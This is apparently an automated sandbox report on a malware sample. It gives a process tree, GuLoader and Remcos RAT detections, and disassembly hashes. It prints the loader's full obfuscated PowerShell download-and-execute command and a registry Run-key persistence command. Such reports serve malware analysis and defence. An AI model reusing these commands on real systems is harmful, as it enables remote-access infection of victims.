                                                              General

                                                              Target ID:6
                                                              Start time:11:07:07
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
                                                              Imagebase:0xc10000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1737463772.0000000008E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.1737667724.000000000AAA8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1718585876.0000000006142000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:11:07:07
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff68cce0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:11:07:33
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                              Imagebase:0xc00000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.2618570494.00000000053D8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:10
                                                              Start time:11:07:49
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
                                                              Imagebase:0xc30000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:11:07:49
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff68cce0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:11:07:49
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
                                                              Imagebase:0x8d0000
                                                              File size:59'392 bytes
                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 00007FFE7CFB47C4 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475816070.00007FFE7CFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cfb0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5d070c7b60b7be2f983b794a5d277d02feeb60c5ba9baf335b456c297b65796e
                                                                • Instruction ID: bbc10fee6a5e2ea406ce0c29c300c9e8a0f1fdc961e3dca0b68e2f223d1563fb
                                                                • Opcode Fuzzy Hash: 5d070c7b60b7be2f983b794a5d277d02feeb60c5ba9baf335b456c297b65796e
                                                                • Instruction Fuzzy Hash: 59012B32B6CD4E4FE39CE61C64002BDB2D6EF84360F94017AD12DC32A6CE2AEC424284
                                                                Function 00007FFE7CEE3945 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475346354.00007FFE7CEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CEE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cee0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction ID: 03c121ce8abc51cb6133377af00588380690b8aa997db89801dfa4325474b532
                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction Fuzzy Hash: C601843115CB084FD744EF0CE451AA5B3E0FB85364F10056EE58AC36A1D622E882CB41
                                                                Function 00007FFE7CEE54FE Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475346354.00007FFE7CEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CEE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cee0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e95d54f8000d17eb4a8beb96f44fb0797319a03709f541431599f88f7337548
                                                                • Instruction ID: dc70880030419dfd7a8c515a21f6edbb8d55455fbb37fecf71b024130c0061b2
                                                                • Opcode Fuzzy Hash: 2e95d54f8000d17eb4a8beb96f44fb0797319a03709f541431599f88f7337548
                                                                • Instruction Fuzzy Hash: B8F0BB3275CA054FDB4C9A0CF84197473D1E799320F10007EE44BC32A6D927E847C681
                                                                Function 00007FFE7CEE550F Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475346354.00007FFE7CEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CEE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cee0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8269cf645cb93548760b68b78a5dfe073930e42589d1dde715617bd1af72e7b4
                                                                • Instruction ID: aee5e28fe0bc6234248b45a6c524e83ffdc1dde1fba3b8b2ffdc19f85c5599d8
                                                                • Opcode Fuzzy Hash: 8269cf645cb93548760b68b78a5dfe073930e42589d1dde715617bd1af72e7b4
                                                                • Instruction Fuzzy Hash: E7F0303275C6044F9B1CAA1CF8439F873D1E795360B14017EE98BC2657E827E8838686
                                                                Function 00007FFE7CFB575B Relevance: .0, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475816070.00007FFE7CFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cfb0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a0c2d9f206dc2070384d5c82ee394d7d92e486877995613db6fe857a26a23dfa
                                                                • Instruction ID: 1fcddd0b582cd2d4a2bc5781c436edf6900117aa6d396a4a908f10fed4504a88
                                                                • Opcode Fuzzy Hash: a0c2d9f206dc2070384d5c82ee394d7d92e486877995613db6fe857a26a23dfa
                                                                • Instruction Fuzzy Hash: 6DF0E232F39C2D4AA398D64C64012FCB2D1FB88760F850277E81DD33A1CE185C0102C0
                                                                Function 00007FFE7CFB7886 Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475816070.00007FFE7CFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cfb0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b8483d227f4f60fc3ebb9f69d7f1357aa4b8e77ed3acf190fb8d3b6ad417e37
                                                                • Instruction ID: c9e649f1defc763fabe760b440c37bde8fad8d0e8fc799e9049bc0fdbf1f33e1
                                                                • Opcode Fuzzy Hash: 9b8483d227f4f60fc3ebb9f69d7f1357aa4b8e77ed3acf190fb8d3b6ad417e37
                                                                • Instruction Fuzzy Hash: ECE02637B6C90D09770DC52C28061F973D2EBC8132B25433BC26EC3240EE12E41742A0
                                                                Function 00007FFE7CFB482D Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475816070.00007FFE7CFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cfb0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99f2b37f658af70e8efb27182d466d758df6b5b7fb9dd78bdb34dfd0f92796b3
                                                                • Instruction ID: f419bf8f91df3d40e428bcef050487dfeb7a87551258da5d55336768bd71a225
                                                                • Opcode Fuzzy Hash: 99f2b37f658af70e8efb27182d466d758df6b5b7fb9dd78bdb34dfd0f92796b3
                                                                • Instruction Fuzzy Hash: F0F06532B6CA558EA35CAB1CA9414F973D1FF85315B5400BAE11DC2572DF36FC528684
                                                                Function 00007FFE7CFB5783 Relevance: .0, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475816070.00007FFE7CFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cfb0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c98e56c7d8d495ab358c17306c2bd4d1ff9b17c43f054e8488cdcb16e43a05a6
                                                                • Instruction ID: c832a02132668ebc6c400a507c085d4a953dbf552e83867a3f9f01ee15d4f40f
                                                                • Opcode Fuzzy Hash: c98e56c7d8d495ab358c17306c2bd4d1ff9b17c43f054e8488cdcb16e43a05a6
                                                                • Instruction Fuzzy Hash: 93D01235D39D6E8AE3A8EB6C940957CB1D1EF58B417550676985DD3261DE282C404380
                                                                Function 00007FFE7CFB1924 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1475816070.00007FFE7CFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffe7cfb0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ff02cf75377036d3a9459ee9590f66f8d69965982c495c9e39f88ecc0a639a26
                                                                • Instruction ID: 00e1229f5d98bb29399fa93aee7140b7fe9841a0d028a50108f1701035aa3312
                                                                • Opcode Fuzzy Hash: ff02cf75377036d3a9459ee9590f66f8d69965982c495c9e39f88ecc0a639a26
                                                                • Instruction Fuzzy Hash: 05D01224B488080FEBC8B22C001C37E10C3EFE8342F14417AE08EC37A7CC29AC820355

                                                                Executed Functions

                                                                Function 07B82BD0 Relevance: 18.1, Strings: 14, Instructions: 606COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-194704533
                                                                • Opcode ID: da7520298d785e2175214d13c79081199f59f760f17ddcbdedd3998560b4bee0
                                                                • Instruction ID: a94c091557fd25d7262d2ca6816c0abde41aaf86a10b16e54459c7bdfce8a0a2
                                                                • Opcode Fuzzy Hash: da7520298d785e2175214d13c79081199f59f760f17ddcbdedd3998560b4bee0
                                                                • Instruction Fuzzy Hash: C91237F1B04206DFEB65AB29C8147AABBE2FF81610F14C4EBD455CB255DB32C845C7A1
                                                                Function 07B86BA8 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q$4'_q$4'_q$4'_q
                                                                • API String ID: 0-1928675863
                                                                • Opcode ID: 90eaff2aa8bdbe78e5ed5bca90eccc0351d5da106d7cac61842066e5e950cf03
                                                                • Instruction ID: f4e04dfaaece151a6e3f587bd447300b3709cbfa16f0e06f124c3c5bb5a405cf
                                                                • Opcode Fuzzy Hash: 90eaff2aa8bdbe78e5ed5bca90eccc0351d5da106d7cac61842066e5e950cf03
                                                                • Instruction Fuzzy Hash: BCD181F4A002059FD714EB68C555B9EBBB2EF88308F20C4A9E4156F359CB76DC46CB91
                                                                Function 07B8737D Relevance: 7.8, Strings: 6, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q$4'_q$4'_q$4'_q
                                                                • API String ID: 0-1928675863
                                                                • Opcode ID: 788fd2967d444824073284d342ea4a2f1a97b9c4f5efe9b90b0009d5d913c91d
                                                                • Instruction ID: 3217cc2bcd9ca5a4ef77b2c41b90f5c106e8b03dad2b36e879ab799aff74de64
                                                                • Opcode Fuzzy Hash: 788fd2967d444824073284d342ea4a2f1a97b9c4f5efe9b90b0009d5d913c91d
                                                                • Instruction Fuzzy Hash: 2ED193B4A012199FD714DB58C955B9EBBB2FB84308F2084E9D509AF385CB31DD86CF91
                                                                Function 07B8A5B8 Relevance: 5.6, Strings: 4, Instructions: 570COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q$4'_q
                                                                • API String ID: 0-4157139909
                                                                • Opcode ID: ba46efc8e847128d27c916eb290ec70685c003bb66ab3b8f64f78c0dc34d754d
                                                                • Instruction ID: 69312b939bdc5e19d868c9e8c5dc9f52c2598502e48498965ef5f368bca02559
                                                                • Opcode Fuzzy Hash: ba46efc8e847128d27c916eb290ec70685c003bb66ab3b8f64f78c0dc34d754d
                                                                • Instruction Fuzzy Hash: 0F0265F5B04206DFEB64AA68880076ABBA2EFC1314F14C0FBD515DB254DB35D852C7E2
                                                                Function 07B88DA8 Relevance: 4.0, Strings: 3, Instructions: 286COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$$_q
                                                                • API String ID: 0-2880775569
                                                                • Opcode ID: 4e9915427ff99c843be0661f03c1fd24cce25b943337d8d630b29074f8285eff
                                                                • Instruction ID: ab9b2f06787e62e982f5d0b5c4df3ad3799bb4efb0237eda40a98e6a006365fb
                                                                • Opcode Fuzzy Hash: 4e9915427ff99c843be0661f03c1fd24cce25b943337d8d630b29074f8285eff
                                                                • Instruction Fuzzy Hash: CC9166F0B143069FEB64AB78C81076A7BE3EF95204F5484EAD505CF2A5DB36D841C7A2
                                                                Function 07B86B88 Relevance: 4.0, Strings: 3, Instructions: 283COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q
                                                                • API String ID: 0-1671372780
                                                                • Opcode ID: 7af3c47e0d7b63d54df410120b51aa95368ad95c4a9f5b2a7af87e68806e88b2
                                                                • Instruction ID: 0a597679ae8ede1a691694468eb8c38590c397efc9b28a0c772de27d045efe3d
                                                                • Opcode Fuzzy Hash: 7af3c47e0d7b63d54df410120b51aa95368ad95c4a9f5b2a7af87e68806e88b2
                                                                • Instruction Fuzzy Hash: BDB19EF4A002059FE754EF54C555B9EBBB2EB88308F24C0A9E4146F35ACB36E885CB91
                                                                Function 07B80A80 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q$$_q
                                                                • API String ID: 0-2441406858
                                                                • Opcode ID: 3f62ad29b540aa4f9634421cb1bd576aca8a33e9ee28b39a6fffbf2b28cd70fe
                                                                • Instruction ID: 7fac5fab54a21efecd449f63c6ac470cd61dcda7ee96aa3afb43fb8df0ee5682
